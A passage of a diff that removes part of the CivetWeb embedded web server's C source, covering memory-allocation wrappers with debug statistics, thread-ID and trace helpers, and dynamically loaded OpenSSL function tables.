-		memory = (void *)(((char *)data) + 2 * sizeof(uintptr_t));
-	}
-
-#if defined(MEMORY_DEBUGGING)
-	sprintf(mallocStr,
-	        "MEM: %p %5lu alloc   %7lu %4lu --- %s:%u\n",
-	        memory,
-	        (unsigned long)size,
-	        (unsigned long)mstat->totalMemUsed,
-	        (unsigned long)mstat->blockCount,
-	        file,
-	        line);
-#if defined(_WIN32)
-	OutputDebugStringA(mallocStr);
-#else
-	DEBUG_TRACE("%s", mallocStr);
-#endif
-#endif
-
-	return memory;
-}
-
-
-static void *
-mg_calloc_ex(size_t count,
-             size_t size,
-             struct mg_context *ctx,
-             const char *file,
-             unsigned line)
-{
-	void *data = mg_malloc_ex(size * count, ctx, file, line);
-
-	if (data) {
-		memset(data, 0, size * count);
-	}
-	return data;
-}
-
-
-static void
-mg_free_ex(void *memory, const char *file, unsigned line)
-{
-	void *data = (void *)(((char *)memory) - 2 * sizeof(uintptr_t));
-
-
-#if defined(MEMORY_DEBUGGING)
-	char mallocStr[256];
-#else
-	(void)file;
-	(void)line;
-#endif
-
-	if (memory) {
-		uintptr_t size = ((uintptr_t *)data)[0];
-		struct mg_memory_stat *mstat =
-		    (struct mg_memory_stat *)(((uintptr_t *)data)[1]);
-		mg_atomic_add(&mstat->totalMemUsed, -(int64_t)size);
-		mg_atomic_dec(&mstat->blockCount);
-#if defined(MEMORY_DEBUGGING)
-		sprintf(mallocStr,
-		        "MEM: %p %5lu free    %7lu %4lu --- %s:%u\n",
-		        memory,
-		        (unsigned long)size,
-		        (unsigned long)mstat->totalMemUsed,
-		        (unsigned long)mstat->blockCount,
-		        file,
-		        line);
-#if defined(_WIN32)
-		OutputDebugStringA(mallocStr);
-#else
-		DEBUG_TRACE("%s", mallocStr);
-#endif
-#endif
-		free(data);
-	}
-}
-
-
-static void *
-mg_realloc_ex(void *memory,
-              size_t newsize,
-              struct mg_context *ctx,
-              const char *file,
-              unsigned line)
-{
-	void *data;
-	void *_realloc;
-	uintptr_t oldsize;
-
-#if defined(MEMORY_DEBUGGING)
-	char mallocStr[256];
-#else
-	(void)file;
-	(void)line;
-#endif
-
-	if (newsize) {
-		if (memory) {
-			/* Reallocate existing block */
-			struct mg_memory_stat *mstat;
-			data = (void *)(((char *)memory) - 2 * sizeof(uintptr_t));
-			oldsize = ((uintptr_t *)data)[0];
-			mstat = (struct mg_memory_stat *)((uintptr_t *)data)[1];
-			_realloc = realloc(data, newsize + 2 * sizeof(uintptr_t));
-			if (_realloc) {
-				data = _realloc;
-				mg_atomic_add(&mstat->totalMemUsed, -(int64_t)oldsize);
-#if defined(MEMORY_DEBUGGING)
-				sprintf(mallocStr,
-				        "MEM: %p %5lu r-free  %7lu %4lu --- %s:%u\n",
-				        memory,
-				        (unsigned long)oldsize,
-				        (unsigned long)mstat->totalMemUsed,
-				        (unsigned long)mstat->blockCount,
-				        file,
-				        line);
-#if defined(_WIN32)
-				OutputDebugStringA(mallocStr);
-#else
-				DEBUG_TRACE("%s", mallocStr);
-#endif
-#endif
-				mg_atomic_add(&mstat->totalMemUsed, (int64_t)newsize);
-#if defined(MEMORY_DEBUGGING)
-				sprintf(mallocStr,
-				        "MEM: %p %5lu r-alloc %7lu %4lu --- %s:%u\n",
-				        memory,
-				        (unsigned long)newsize,
-				        (unsigned long)mstat->totalMemUsed,
-				        (unsigned long)mstat->blockCount,
-				        file,
-				        line);
-#if defined(_WIN32)
-				OutputDebugStringA(mallocStr);
-#else
-				DEBUG_TRACE("%s", mallocStr);
-#endif
-#endif
-				*(uintptr_t *)data = newsize;
-				data = (void *)(((char *)data) + 2 * sizeof(uintptr_t));
-			} else {
-#if defined(MEMORY_DEBUGGING)
-#if defined(_WIN32)
-				OutputDebugStringA("MEM: realloc failed\n");
-#else
-				DEBUG_TRACE("%s", "MEM: realloc failed\n");
-#endif
-#endif
-				return _realloc;
-			}
-		} else {
-			/* Allocate new block */
-			data = mg_malloc_ex(newsize, ctx, file, line);
-		}
-	} else {
-		/* Free existing block */
-		data = 0;
-		mg_free_ex(memory, file, line);
-	}
-
-	return data;
-}
-
-#define mg_malloc(a) mg_malloc_ex(a, NULL, __FILE__, __LINE__)
-#define mg_calloc(a, b) mg_calloc_ex(a, b, NULL, __FILE__, __LINE__)
-#define mg_realloc(a, b) mg_realloc_ex(a, b, NULL, __FILE__, __LINE__)
-#define mg_free(a) mg_free_ex(a, __FILE__, __LINE__)
-
-#define mg_malloc_ctx(a, c) mg_malloc_ex(a, c, __FILE__, __LINE__)
-#define mg_calloc_ctx(a, b, c) mg_calloc_ex(a, b, c, __FILE__, __LINE__)
-#define mg_realloc_ctx(a, b, c) mg_realloc_ex(a, b, c, __FILE__, __LINE__)
-
-#else /* USE_SERVER_STATS */
-
-static __inline void *
-mg_malloc(size_t a)
-{
-	return malloc(a);
-}
-
-static __inline void *
-mg_calloc(size_t a, size_t b)
-{
-	return calloc(a, b);
-}
-
-static __inline void *
-mg_realloc(void *a, size_t b)
-{
-	return realloc(a, b);
-}
-
-static __inline void
-mg_free(void *a)
-{
-	free(a);
-}
-
-#define mg_malloc_ctx(a, c) mg_malloc(a)
-#define mg_calloc_ctx(a, b, c) mg_calloc(a, b)
-#define mg_realloc_ctx(a, b, c) mg_realloc(a, b)
-#define mg_free_ctx(a, c) mg_free(a)
-
-#endif /* USE_SERVER_STATS */
-
-
-static void mg_vsnprintf(const struct mg_connection *conn,
-                         int *truncated,
-                         char *buf,
-                         size_t buflen,
-                         const char *fmt,
-                         va_list ap);
-
-static void mg_snprintf(const struct mg_connection *conn,
-                        int *truncated,
-                        char *buf,
-                        size_t buflen,
-                        PRINTF_FORMAT_STRING(const char *fmt),
-                        ...) PRINTF_ARGS(5, 6);
-
-/* This following lines are just meant as a reminder to use the mg-functions
- * for memory management */
-#ifdef malloc
-#undef malloc
-#endif
-#ifdef calloc
-#undef calloc
-#endif
-#ifdef realloc
-#undef realloc
-#endif
-#ifdef free
-#undef free
-#endif
-#ifdef snprintf
-#undef snprintf
-#endif
-#ifdef vsnprintf
-#undef vsnprintf
-#endif
-#define malloc DO_NOT_USE_THIS_FUNCTION__USE_mg_malloc
-#define calloc DO_NOT_USE_THIS_FUNCTION__USE_mg_calloc
-#define realloc DO_NOT_USE_THIS_FUNCTION__USE_mg_realloc
-#define free DO_NOT_USE_THIS_FUNCTION__USE_mg_free
-#define snprintf DO_NOT_USE_THIS_FUNCTION__USE_mg_snprintf
-#ifdef _WIN32 /* vsnprintf must not be used in any system, * \ \ \             \
-               * but this define only works well for Windows. */
-#define vsnprintf DO_NOT_USE_THIS_FUNCTION__USE_mg_vsnprintf
-#endif
-
-
-/* mg_init_library counter */
-static int mg_init_library_called = 0;
-
-#if !defined(NO_SSL)
-static int mg_ssl_initialized = 0;
-#endif
-
-static pthread_key_t sTlsKey; /* Thread local storage index */
-static int thread_idx_max = 0;
-
-
-struct mg_workerTLS {
-	int is_master;
-	unsigned long thread_idx;
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	HANDLE pthread_cond_helper_mutex;
-	struct mg_workerTLS *next_waiting_thread;
-#endif
-};
-
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) || defined(__MINGW32__) */
-#if defined(__clang__)
-/* Show no warning in case system functions are not used. */
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunused-function"
-#endif
-
-
-/* Get a unique thread ID as unsigned long, independent from the data type
- * of thread IDs defined by the operating system API.
- * If two calls to mg_current_thread_id  return the same value, they calls
- * are done from the same thread. If they return different values, they are
- * done from different threads. (Provided this function is used in the same
- * process context and threads are not repeatedly created and deleted, but
- * CivetWeb does not do that).
- * This function must match the signature required for SSL id callbacks:
- * CRYPTO_set_id_callback
- */
-FUNCTION_MAY_BE_UNUSED
-static unsigned long
-mg_current_thread_id(void)
-{
-#ifdef _WIN32
-	return GetCurrentThreadId();
-#else
-
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunreachable-code"
-/* For every compiler, either "sizeof(pthread_t) > sizeof(unsigned long)"
- * or not, so one of the two conditions will be unreachable by construction.
- * Unfortunately the C standard does not define a way to check this at
- * compile time, since the #if preprocessor conditions can not use the sizeof
- * operator as an argument. */
-#endif
-
-	if (sizeof(pthread_t) > sizeof(unsigned long)) {
-		/* This is the problematic case for CRYPTO_set_id_callback:
-		 * The OS pthread_t can not be cast to unsigned long. */
-		struct mg_workerTLS *tls =
-		    (struct mg_workerTLS *)pthread_getspecific(sTlsKey);
-		if (tls == NULL) {
-			/* SSL called from an unknown thread: Create some thread index.
-			 */
-			tls = (struct mg_workerTLS *)mg_malloc(sizeof(struct mg_workerTLS));
-			tls->is_master = -2; /* -2 means "3rd party thread" */
-			tls->thread_idx = (unsigned)mg_atomic_inc(&thread_idx_max);
-			pthread_setspecific(sTlsKey, tls);
-		}
-		return tls->thread_idx;
-	} else {
-		/* pthread_t may be any data type, so a simple cast to unsigned long
-		 * can rise a warning/error, depending on the platform.
-		 * Here memcpy is used as an anything-to-anything cast. */
-		unsigned long ret = 0;
-		pthread_t t = pthread_self();
-		memcpy(&ret, &t, sizeof(pthread_t));
-		return ret;
-	}
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-#endif
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static uint64_t
-mg_get_current_time_ns(void)
-{
-	struct timespec tsnow;
-	clock_gettime(CLOCK_REALTIME, &tsnow);
-	return (((uint64_t)tsnow.tv_sec) * 1000000000) + (uint64_t)tsnow.tv_nsec;
-}
-
-
-#if defined(__GNUC__)
-/* Show no warning in case system functions are not used. */
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic pop
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) */
-#if defined(__clang__)
-/* Show no warning in case system functions are not used. */
-#pragma clang diagnostic pop
-#endif
-
-
-#if !defined(DEBUG_TRACE)
-#if defined(DEBUG)
-static void DEBUG_TRACE_FUNC(const char *func,
-                             unsigned line,
-                             PRINTF_FORMAT_STRING(const char *fmt),
-                             ...) PRINTF_ARGS(3, 4);
-
-static void
-DEBUG_TRACE_FUNC(const char *func, unsigned line, const char *fmt, ...)
-{
-	va_list args;
-	uint64_t nsnow;
-	static uint64_t nslast;
-	struct timespec tsnow;
-
-	/* Get some operating system independent thread id */
-	unsigned long thread_id = mg_current_thread_id();
-
-	clock_gettime(CLOCK_REALTIME, &tsnow);
-	nsnow = ((uint64_t)tsnow.tv_sec) * ((uint64_t)1000000000)
-	        + ((uint64_t)tsnow.tv_nsec);
-
-	if (!nslast) {
-		nslast = nsnow;
-	}
-
-	flockfile(stdout);
-	printf("*** %lu.%09lu %12" INT64_FMT " %lu %s:%u: ",
-	       (unsigned long)tsnow.tv_sec,
-	       (unsigned long)tsnow.tv_nsec,
-	       nsnow - nslast,
-	       thread_id,
-	       func,
-	       line);
-	va_start(args, fmt);
-	vprintf(fmt, args);
-	va_end(args);
-	putchar('\n');
-	fflush(stdout);
-	funlockfile(stdout);
-	nslast = nsnow;
-}
-
-#define DEBUG_TRACE(fmt, ...)                                                  \
-	DEBUG_TRACE_FUNC(__func__, __LINE__, fmt, __VA_ARGS__)
-
-#else
-#define DEBUG_TRACE(fmt, ...)                                                  \
-	do {                                                                       \
-	} while (0)
-#endif /* DEBUG */
-#endif /* DEBUG_TRACE */
-
-
-#define MD5_STATIC static
-#include "md5.inl"
-
-/* Darwin prior to 7.0 and Win32 do not have socklen_t */
-#ifdef NO_SOCKLEN_T
-typedef int socklen_t;
-#endif /* NO_SOCKLEN_T */
-#define _DARWIN_UNLIMITED_SELECT
-
-#define IP_ADDR_STR_LEN (50) /* IPv6 hex string is 46 chars */
-
-#if !defined(MSG_NOSIGNAL)
-#define MSG_NOSIGNAL (0)
-#endif
-
-#if !defined(SOMAXCONN)
-#define SOMAXCONN (100)
-#endif
-
-/* Size of the accepted socket queue */
-#if !defined(MGSQLEN)
-#define MGSQLEN (20)
-#endif
-
-
-#if defined(NO_SSL)
-typedef struct SSL SSL; /* dummy for SSL argument to push/pull */
-typedef struct SSL_CTX SSL_CTX;
-#else
-#if defined(NO_SSL_DL)
-#include <openssl/ssl.h>
-#include <openssl/err.h>
-#include <openssl/crypto.h>
-#include <openssl/x509.h>
-#include <openssl/pem.h>
-#include <openssl/engine.h>
-#include <openssl/conf.h>
-#include <openssl/dh.h>
-#include <openssl/bn.h>
-#include <openssl/opensslv.h>
-#else
-
-/* SSL loaded dynamically from DLL.
- * I put the prototypes here to be independent from OpenSSL source
- * installation. */
-
-typedef struct ssl_st SSL;
-typedef struct ssl_method_st SSL_METHOD;
-typedef struct ssl_ctx_st SSL_CTX;
-typedef struct x509_store_ctx_st X509_STORE_CTX;
-typedef struct x509_name X509_NAME;
-typedef struct asn1_integer ASN1_INTEGER;
-typedef struct bignum BIGNUM;
-typedef struct ossl_init_settings_st OPENSSL_INIT_SETTINGS;
-typedef struct evp_md EVP_MD;
-typedef struct x509 X509;
-
-
-#define SSL_CTRL_OPTIONS (32)
-#define SSL_CTRL_CLEAR_OPTIONS (77)
-#define SSL_CTRL_SET_ECDH_AUTO (94)
-
-#define OPENSSL_INIT_NO_LOAD_SSL_STRINGS 0x00100000L
-#define OPENSSL_INIT_LOAD_SSL_STRINGS 0x00200000L
-#define OPENSSL_INIT_LOAD_CRYPTO_STRINGS 0x00000002L
-
-#define SSL_VERIFY_NONE (0)
-#define SSL_VERIFY_PEER (1)
-#define SSL_VERIFY_FAIL_IF_NO_PEER_CERT (2)
-#define SSL_VERIFY_CLIENT_ONCE (4)
-#define SSL_OP_ALL ((long)(0x80000BFFUL))
-#define SSL_OP_NO_SSLv2 (0x01000000L)
-#define SSL_OP_NO_SSLv3 (0x02000000L)
-#define SSL_OP_NO_TLSv1 (0x04000000L)
-#define SSL_OP_NO_TLSv1_2 (0x08000000L)
-#define SSL_OP_NO_TLSv1_1 (0x10000000L)
-#define SSL_OP_SINGLE_DH_USE (0x00100000L)
-#define SSL_OP_CIPHER_SERVER_PREFERENCE (0x00400000L)
-#define SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION (0x00010000L)
-#define SSL_OP_NO_COMPRESSION (0x00020000L)
-
-#define SSL_CB_HANDSHAKE_START (0x10)
-#define SSL_CB_HANDSHAKE_DONE (0x20)
-
-#define SSL_ERROR_NONE (0)
-#define SSL_ERROR_SSL (1)
-#define SSL_ERROR_WANT_READ (2)
-#define SSL_ERROR_WANT_WRITE (3)
-#define SSL_ERROR_WANT_X509_LOOKUP (4)
-#define SSL_ERROR_SYSCALL (5) /* see errno */
-#define SSL_ERROR_ZERO_RETURN (6)
-#define SSL_ERROR_WANT_CONNECT (7)
-#define SSL_ERROR_WANT_ACCEPT (8)
-
-
-struct ssl_func {
-	const char *name;  /* SSL function name */
-	void (*ptr)(void); /* Function pointer */
-};
-
-
-#ifdef OPENSSL_API_1_1
-
-#define SSL_free (*(void (*)(SSL *))ssl_sw[0].ptr)
-#define SSL_accept (*(int (*)(SSL *))ssl_sw[1].ptr)
-#define SSL_connect (*(int (*)(SSL *))ssl_sw[2].ptr)
-#define SSL_read (*(int (*)(SSL *, void *, int))ssl_sw[3].ptr)
-#define SSL_write (*(int (*)(SSL *, const void *, int))ssl_sw[4].ptr)
-#define SSL_get_error (*(int (*)(SSL *, int))ssl_sw[5].ptr)
-#define SSL_set_fd (*(int (*)(SSL *, SOCKET))ssl_sw[6].ptr)
-#define SSL_new (*(SSL * (*)(SSL_CTX *))ssl_sw[7].ptr)
-#define SSL_CTX_new (*(SSL_CTX * (*)(SSL_METHOD *))ssl_sw[8].ptr)
-#define TLS_server_method (*(SSL_METHOD * (*)(void))ssl_sw[9].ptr)
-#define OPENSSL_init_ssl                                                       \
-	(*(int (*)(uint64_t opts,                                                  \
-	           const OPENSSL_INIT_SETTINGS *settings))ssl_sw[10].ptr)
-#define SSL_CTX_use_PrivateKey_file                                            \
-	(*(int (*)(SSL_CTX *, const char *, int))ssl_sw[11].ptr)
-#define SSL_CTX_use_certificate_file                                           \
-	(*(int (*)(SSL_CTX *, const char *, int))ssl_sw[12].ptr)
-#define SSL_CTX_set_default_passwd_cb                                          \
-	(*(void (*)(SSL_CTX *, mg_callback_t))ssl_sw[13].ptr)
-#define SSL_CTX_free (*(void (*)(SSL_CTX *))ssl_sw[14].ptr)
-#define SSL_CTX_use_certificate_chain_file                                     \
-	(*(int (*)(SSL_CTX *, const char *))ssl_sw[15].ptr)
-#define TLS_client_method (*(SSL_METHOD * (*)(void))ssl_sw[16].ptr)
-#define SSL_pending (*(int (*)(SSL *))ssl_sw[17].ptr)
-#define SSL_CTX_set_verify                                                     \
-	(*(void (*)(SSL_CTX *,                                                     \
-	            int,                                                           \
-	            int (*verify_callback)(int, X509_STORE_CTX *)))ssl_sw[18].ptr)
-#define SSL_shutdown (*(int (*)(SSL *))ssl_sw[19].ptr)
-#define SSL_CTX_load_verify_locations                                          \
-	(*(int (*)(SSL_CTX *, const char *, const char *))ssl_sw[20].ptr)
-#define SSL_CTX_set_default_verify_paths (*(int (*)(SSL_CTX *))ssl_sw[21].ptr)
-#define SSL_CTX_set_verify_depth (*(void (*)(SSL_CTX *, int))ssl_sw[22].ptr)
-#define SSL_get_peer_certificate (*(X509 * (*)(SSL *))ssl_sw[23].ptr)
-#define SSL_get_version (*(const char *(*)(SSL *))ssl_sw[24].ptr)
-#define SSL_get_current_cipher (*(SSL_CIPHER * (*)(SSL *))ssl_sw[25].ptr)
-#define SSL_CIPHER_get_name                                                    \
-	(*(const char *(*)(const SSL_CIPHER *))ssl_sw[26].ptr)
-#define SSL_CTX_check_private_key (*(int (*)(SSL_CTX *))ssl_sw[27].ptr)
-#define SSL_CTX_set_session_id_context                                         \
-	(*(int (*)(SSL_CTX *, const unsigned char *, unsigned int))ssl_sw[28].ptr)
-#define SSL_CTX_ctrl (*(long (*)(SSL_CTX *, int, long, void *))ssl_sw[29].ptr)
-#define SSL_CTX_set_cipher_list                                                \
-	(*(int (*)(SSL_CTX *, const char *))ssl_sw[30].ptr)
-#define SSL_CTX_set_options                                                    \
-	(*(unsigned long (*)(SSL_CTX *, unsigned long))ssl_sw[31].ptr)
-#define SSL_CTX_set_info_callback                                              \
-	(*(void (*)(SSL_CTX * ctx,                                                 \
-	            void (*callback)(SSL * s, int, int)))ssl_sw[32].ptr)
-#define SSL_get_ex_data (*(char *(*)(SSL *, int))ssl_sw[33].ptr)
-#define SSL_set_ex_data (*(void (*)(SSL *, int, char *))ssl_sw[34].ptr)
-
-#define SSL_CTX_clear_options(ctx, op)                                         \
-	SSL_CTX_ctrl((ctx), SSL_CTRL_CLEAR_OPTIONS, (op), NULL)
-#define SSL_CTX_set_ecdh_auto(ctx, onoff)                                      \
-	SSL_CTX_ctrl(ctx, SSL_CTRL_SET_ECDH_AUTO, onoff, NULL)
-
-#define X509_get_notBefore(x) ((x)->cert_info->validity->notBefore)
-#define X509_get_notAfter(x) ((x)->cert_info->validity->notAfter)
-
-#define SSL_set_app_data(s, arg) (SSL_set_ex_data(s, 0, (char *)arg))
-#define SSL_get_app_data(s) (SSL_get_ex_data(s, 0))
-
-#define ERR_get_error (*(unsigned long (*)(void))crypto_sw[0].ptr)
-#define ERR_error_string (*(char *(*)(unsigned long, char *))crypto_sw[1].ptr)
-#define ERR_remove_state (*(void (*)(unsigned long))crypto_sw[2].ptr)
-#define CONF_modules_unload (*(void (*)(int))crypto_sw[3].ptr)
-#define X509_free (*(void (*)(X509 *))crypto_sw[4].ptr)
-#define X509_get_subject_name (*(X509_NAME * (*)(X509 *))crypto_sw[5].ptr)
-#define X509_get_issuer_name (*(X509_NAME * (*)(X509 *))crypto_sw[6].ptr)
-#define X509_NAME_oneline                                                      \
-	(*(char *(*)(X509_NAME *, char *, int))crypto_sw[7].ptr)
-#define X509_get_serialNumber (*(ASN1_INTEGER * (*)(X509 *))crypto_sw[8].ptr)
-#define EVP_get_digestbyname                                                   \
-	(*(const EVP_MD *(*)(const char *))crypto_sw[9].ptr)
-#define EVP_Digest                                                             \
-	(*(int (*)(                                                                \
-	    const void *, size_t, void *, unsigned int *, const EVP_MD *, void *)) \
-	      crypto_sw[10].ptr)
-#define i2d_X509 (*(int (*)(X509 *, unsigned char **))crypto_sw[11].ptr)
-#define BN_bn2hex (*(char *(*)(const BIGNUM *a))crypto_sw[12].ptr)
-#define ASN1_INTEGER_to_BN                                                     \
-	(*(BIGNUM * (*)(const ASN1_INTEGER *ai, BIGNUM *bn))crypto_sw[13].ptr)
-#define BN_free (*(void (*)(const BIGNUM *a))crypto_sw[14].ptr)
-#define CRYPTO_free (*(void (*)(void *addr))crypto_sw[15].ptr)
-
-#define OPENSSL_free(a) CRYPTO_free(a)
-
-
-/* set_ssl_option() function updates this array.
- * It loads SSL library dynamically and changes NULLs to the actual addresses
- * of respective functions. The macros above (like SSL_connect()) are really
- * just calling these functions indirectly via the pointer. */
-static struct ssl_func ssl_sw[] = {{"SSL_free", NULL},
-                                   {"SSL_accept", NULL},
-                                   {"SSL_connect", NULL},
-                                   {"SSL_read", NULL},
-                                   {"SSL_write", NULL},
-                                   {"SSL_get_error", NULL},
-                                   {"SSL_set_fd", NULL},
-                                   {"SSL_new", NULL},
-                                   {"SSL_CTX_new", NULL},
-                                   {"TLS_server_method", NULL},
-                                   {"OPENSSL_init_ssl", NULL},
-                                   {"SSL_CTX_use_PrivateKey_file", NULL},
-                                   {"SSL_CTX_use_certificate_file", NULL},
-                                   {"SSL_CTX_set_default_passwd_cb", NULL},
-                                   {"SSL_CTX_free", NULL},
-                                   {"SSL_CTX_use_certificate_chain_file", NULL},
-                                   {"TLS_client_method", NULL},
-                                   {"SSL_pending", NULL},
-                                   {"SSL_CTX_set_verify", NULL},
-                                   {"SSL_shutdown", NULL},
-                                   {"SSL_CTX_load_verify_locations", NULL},
-                                   {"SSL_CTX_set_default_verify_paths", NULL},
-                                   {"SSL_CTX_set_verify_depth", NULL},
-                                   {"SSL_get_peer_certificate", NULL},
-                                   {"SSL_get_version", NULL},
-                                   {"SSL_get_current_cipher", NULL},
-                                   {"SSL_CIPHER_get_name", NULL},
-                                   {"SSL_CTX_check_private_key", NULL},
-                                   {"SSL_CTX_set_session_id_context", NULL},
-                                   {"SSL_CTX_ctrl", NULL},
-                                   {"SSL_CTX_set_cipher_list", NULL},
-                                   {"SSL_CTX_set_options", NULL},
-                                   {"SSL_CTX_set_info_callback", NULL},
-                                   {"SSL_get_ex_data", NULL},
-                                   {"SSL_set_ex_data", NULL},
-                                   {NULL, NULL}};
-
-
-/* Similar array as ssl_sw. These functions could be located in different
- * lib. */
-static struct ssl_func crypto_sw[] = {{"ERR_get_error", NULL},
-                                      {"ERR_error_string", NULL},
-                                      {"ERR_remove_state", NULL},
-                                      {"CONF_modules_unload", NULL},
-                                      {"X509_free", NULL},
-                                      {"X509_get_subject_name", NULL},
-                                      {"X509_get_issuer_name", NULL},
-                                      {"X509_NAME_oneline", NULL},
-                                      {"X509_get_serialNumber", NULL},
-                                      {"EVP_get_digestbyname", NULL},
-                                      {"EVP_Digest", NULL},
-                                      {"i2d_X509", NULL},
-                                      {"BN_bn2hex", NULL},
-                                      {"ASN1_INTEGER_to_BN", NULL},
-                                      {"BN_free", NULL},
-                                      {"CRYPTO_free", NULL},
-                                      {NULL, NULL}};
-#else
-
-#define SSL_free (*(void (*)(SSL *))ssl_sw[0].ptr)
-#define SSL_accept (*(int (*)(SSL *))ssl_sw[1].ptr)
-#define SSL_connect (*(int (*)(SSL *))ssl_sw[2].ptr)
-#define SSL_read (*(int (*)(SSL *, void *, int))ssl_sw[3].ptr)
-#define SSL_write (*(int (*)(SSL *, const void *, int))ssl_sw[4].ptr)
-#define SSL_get_error (*(int (*)(SSL *, int))ssl_sw[5].ptr)
-#define SSL_set_fd (*(int (*)(SSL *, SOCKET))ssl_sw[6].ptr)
-#define SSL_new (*(SSL * (*)(SSL_CTX *))ssl_sw[7].ptr)
-#define SSL_CTX_new (*(SSL_CTX * (*)(SSL_METHOD *))ssl_sw[8].ptr)
-#define SSLv23_server_method (*(SSL_METHOD * (*)(void))ssl_sw[9].ptr)
-#define SSL_library_init (*(int (*)(void))ssl_sw[10].ptr)
-#define SSL_CTX_use_PrivateKey_file                                            \
-	(*(int (*)(SSL_CTX *, const char *, int))ssl_sw[11].ptr)
-#define SSL_CTX_use_certificate_file                                           \
-	(*(int (*)(SSL_CTX *, const char *, int))ssl_sw[12].ptr)
-#define SSL_CTX_set_default_passwd_cb                                          \
-	(*(void (*)(SSL_CTX *, mg_callback_t))ssl_sw[13].ptr)
-#define SSL_CTX_free (*(void (*)(SSL_CTX *))ssl_sw[14].ptr)
-#define SSL_load_error_strings (*(void (*)(void))ssl_sw[15].ptr)
-#define SSL_CTX_use_certificate_chain_file                                     \
-	(*(int (*)(SSL_CTX *, const char *))ssl_sw[16].ptr)
-#define SSLv23_client_method (*(SSL_METHOD * (*)(void))ssl_sw[17].ptr)
-#define SSL_pending (*(int (*)(SSL *))ssl_sw[18].ptr)
-#define SSL_CTX_set_verify                                                     \
-	(*(void (*)(SSL_CTX *,                                                     \
-	            int,                                                           \
-	            int (*verify_callback)(int, X509_STORE_CTX *)))ssl_sw[19].ptr)
-#define SSL_shutdown (*(int (*)(SSL *))ssl_sw[20].ptr)
-#define SSL_CTX_load_verify_locations                                          \
-	(*(int (*)(SSL_CTX *, const char *, const char *))ssl_sw[21].ptr)
-#define SSL_CTX_set_default_verify_paths (*(int (*)(SSL_CTX *))ssl_sw[22].ptr)
-#define SSL_CTX_set_verify_depth (*(void (*)(SSL_CTX *, int))ssl_sw[23].ptr)
-#define SSL_get_peer_certificate (*(X509 * (*)(SSL *))ssl_sw[24].ptr)
-#define SSL_get_version (*(const char *(*)(SSL *))ssl_sw[25].ptr)
-#define SSL_get_current_cipher (*(SSL_CIPHER * (*)(SSL *))ssl_sw[26].ptr)
-#define SSL_CIPHER_get_name                                                    \
-	(*(const char *(*)(const SSL_CIPHER *))ssl_sw[27].ptr)
-#define SSL_CTX_check_private_key (*(int (*)(SSL_CTX *))ssl_sw[28].ptr)
-#define SSL_CTX_set_session_id_context                                         \
-	(*(int (*)(SSL_CTX *, const unsigned char *, unsigned int))ssl_sw[29].ptr)
-#define SSL_CTX_ctrl (*(long (*)(SSL_CTX *, int, long, void *))ssl_sw[30].ptr)
-#define SSL_CTX_set_cipher_list                                                \
-	(*(int (*)(SSL_CTX *, const char *))ssl_sw[31].ptr)
-#define SSL_CTX_set_info_callback                                              \
-	(*(void (*)(SSL_CTX * ctx,                                                 \
-	            void (*callback)(SSL * s, int, int)))ssl_sw[32].ptr)
-#define SSL_get_ex_data (*(char *(*)(SSL *, int))ssl_sw[33].ptr)
-#define SSL_set_ex_data (*(void (*)(SSL *, int, char *))ssl_sw[34].ptr)
-
-#define SSL_CTX_set_options(ctx, op)                                           \
-	SSL_CTX_ctrl((ctx), SSL_CTRL_OPTIONS, (op), NULL)
-#define SSL_CTX_clear_options(ctx, op)                                         \
-	SSL_CTX_ctrl((ctx), SSL_CTRL_CLEAR_OPTIONS, (op), NULL)
-#define SSL_CTX_set_ecdh_auto(ctx, onoff)                                      \
-	SSL_CTX_ctrl(ctx, SSL_CTRL_SET_ECDH_AUTO, onoff, NULL)
-
-
-#define X509_get_notBefore(x) ((x)->cert_info->validity->notBefore)
-#define X509_get_notAfter(x) ((x)->cert_info->validity->notAfter)
-
-#define SSL_set_app_data(s, arg) (SSL_set_ex_data(s, 0, (char *)arg))
-#define SSL_get_app_data(s) (SSL_get_ex_data(s, 0))
-
-#define CRYPTO_num_locks (*(int (*)(void))crypto_sw[0].ptr)
-#define CRYPTO_set_locking_callback                                            \
-	(*(void (*)(void (*)(int, int, const char *, int)))crypto_sw[1].ptr)
-#define CRYPTO_set_id_callback                                                 \
-	(*(void (*)(unsigned long (*)(void)))crypto_sw[2].ptr)
-#define ERR_get_error (*(unsigned long (*)(void))crypto_sw[3].ptr)
-#define ERR_error_string (*(char *(*)(unsigned long, char *))crypto_sw[4].ptr)
-#define ERR_remove_state (*(void (*)(unsigned long))crypto_sw[5].ptr)
-#define ERR_free_strings (*(void (*)(void))crypto_sw[6].ptr)
-#define ENGINE_cleanup (*(void (*)(void))crypto_sw[7].ptr)
-#define CONF_modules_unload (*(void (*)(int))crypto_sw[8].ptr)
-#define CRYPTO_cleanup_all_ex_data (*(void (*)(void))crypto_sw[9].ptr)
-#define EVP_cleanup (*(void (*)(void))crypto_sw[10].ptr)
-#define X509_free (*(void (*)(X509 *))crypto_sw[11].ptr)
-#define X509_get_subject_name (*(X509_NAME * (*)(X509 *))crypto_sw[12].ptr)
-#define X509_get_issuer_name (*(X509_NAME * (*)(X509 *))crypto_sw[13].ptr)
-#define X509_NAME_oneline                                                      \
-	(*(char *(*)(X509_NAME *, char *, int))crypto_sw[14].ptr)
-#define X509_get_serialNumber (*(ASN1_INTEGER * (*)(X509 *))crypto_sw[15].ptr)
-#define i2c_ASN1_INTEGER                                                       \
-	(*(int (*)(ASN1_INTEGER *, unsigned char **))crypto_sw[16].ptr)
-#define EVP_get_digestbyname                                                   \
-	(*(const EVP_MD *(*)(const char *))crypto_sw[17].ptr)
-#define EVP_Digest                                                             \
-	(*(int (*)(                                                                \
-	    const void *, size_t, void *, unsigned int *, const EVP_MD *, void *)) \
-	      crypto_sw[18].ptr)
-#define i2d_X509 (*(int (*)(X509 *, unsigned char **))crypto_sw[19].ptr)
